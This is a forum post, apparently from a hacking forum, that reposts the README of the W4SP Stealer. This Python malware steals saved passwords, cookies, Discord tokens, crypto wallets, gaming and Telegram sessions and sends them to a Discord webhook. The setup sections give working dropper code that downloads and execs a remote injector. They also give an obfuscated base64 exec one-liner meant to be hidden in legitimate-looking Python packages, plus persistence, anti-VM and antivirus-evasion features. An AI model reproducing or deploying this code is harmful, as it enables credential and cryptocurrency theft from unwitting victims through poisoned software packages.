- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
النحل
W4SP Stealer عنوان
w4sp Stealer official source code, one of the best python stealer on the web
W4SP Stealer | W4SP API | W4SP Bot
تنبيهات
Table of Content
Setup - Stealer
Setup - API & Bot
Features - Stealer
Features - Injector
Features - Api
Features - Bot
Demo
Setup [Stealer & Injector]
Setup [Line ~ Optional but recomanded]
Setup [API]
Для просмотра ссылки Войдиили Зарегистрируйся
Features [Stealer]
(Stealer by @loTus04)
Global
Saved Passwords
Browser Cookies
Get PC information
AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found
All files are uploaded to an external api <- Improved by xKian
Data is send throught a Discord webhook
Discord
Discord Tokens from browsers
Discord Token from discord, discordcanary, discordPTBa
Get all info on token (email, nitro/badge, rare friends)
Wallets
Exodus Wallet
Metamask Wallet
Atomic Walletk
Gaming
Steam Client
Riot Client
NationsGlory Client
Other
Telegram Session
File Stealer
It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information
(idea came from Kiwi plugin on msf)
Features [Injector]
(Injector by @loTus04)
Brilliant persistance technique (only in injector v1.1)
Invisible in TaskManger StartUP tab (only in injector v1.1)
FUD
Fully runs in background
Hides the stealer very well
Credit to xKian who improved the injector (v1.2)
Features [API]
(Api by @billythegoat356)
Easy to update/upgrade
Compatible with all w4sp versions
Using auto & custom obfuscation
Manage Users and Webhooks with API
Browser security => If a browser is detected (headers) it will obfusacate a fake wasp script <- Brilliant Idea by lath
Features [BOT]
(Bot by @billythegoat356)
Easy to configure
Manage Users and Webhooks using w4sp api
Auto inject file.py
Few articles on W4SP (they where writen during beta-testing)
warning
Most articles writen after that are 95% bullshit warning
securelist.com ~ Two more malicious Python packages in the PyPI
securityweek.com ~ Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft
digismak.com ~ Criminals steal data by spoofing popular open source package
darkreading.com ~ Whack-a-Mole: More Malicious PyPI Packages Spring Up Targeting Discord, Roblox
[-private-data-8559-0-]
W4SP Stealer عنوان
w4sp Stealer official source code, one of the best python stealer on the web
W4SP Stealer | W4SP API | W4SP Bot
تنبيهات
Table of Content
Setup - Stealer
Setup - API & Bot
Features - Stealer
Features - Injector
Features - Api
Features - Bot
Demo
Setup [Stealer & Injector]
Код:
Python:
1. Put ur webhook in wasp.py: hook = "DISCORD_WEBHOOK"
2. Obfuscate & Upload anywhere (needs to be accessible with an http request)
3. Put wasp.py link in injector.py: request.urlopen("W4SPGRAB").read()
4. Obfuscate itSetup [Line ~ Optional but recomanded]
Код:
Python:
from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen("INJECTOR_LINK").read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass
# replace INJECTOR_LINK by the injector.py link from setup
# (this script was made by Bill)
Код:
Код:
# encode in b64 the last payload and replace it here
# then hide this line in a legit looking python script
# or use ur brain and ur own technique, this is just un exemple
# remeber, its for education purpose, attacking a machine w/o autorisation is illegal !
__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("%PAYLOAD%"),'<string>','\x65\x78\x65\x63'))Setup [API]
Для просмотра ссылки Войди
Features [Stealer]
(Stealer by @loTus04)
Global
Saved Passwords
Browser Cookies
Get PC information
AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found
All files are uploaded to an external api <- Improved by xKian
Data is send throught a Discord webhook
Discord
Discord Tokens from browsers
Discord Token from discord, discordcanary, discordPTBa
Get all info on token (email, nitro/badge, rare friends)
Wallets
Exodus Wallet
Metamask Wallet
Atomic Walletk
Gaming
Steam Client
Riot Client
NationsGlory Client
Other
Telegram Session
File Stealer
It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information
(idea came from Kiwi plugin on msf)
Features [Injector]
(Injector by @loTus04)
Brilliant persistance technique (only in injector v1.1)
Invisible in TaskManger StartUP tab (only in injector v1.1)
FUD
Fully runs in background
Hides the stealer very well
Credit to xKian who improved the injector (v1.2)
Features [API]
(Api by @billythegoat356)
Easy to update/upgrade
Compatible with all w4sp versions
Using auto & custom obfuscation
Manage Users and Webhooks with API
Browser security => If a browser is detected (headers) it will obfusacate a fake wasp script <- Brilliant Idea by lath
Features [BOT]
(Bot by @billythegoat356)
Easy to configure
Manage Users and Webhooks using w4sp api
Auto inject file.py
Few articles on W4SP (they where writen during beta-testing)
warning
Most articles writen after that are 95% bullshit warning
securelist.com ~ Two more malicious Python packages in the PyPI
securityweek.com ~ Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft
digismak.com ~ Criminals steal data by spoofing popular open source package
darkreading.com ~ Whack-a-Mole: More Malicious PyPI Packages Spring Up Targeting Discord, Roblox
[-private-data-8559-0-]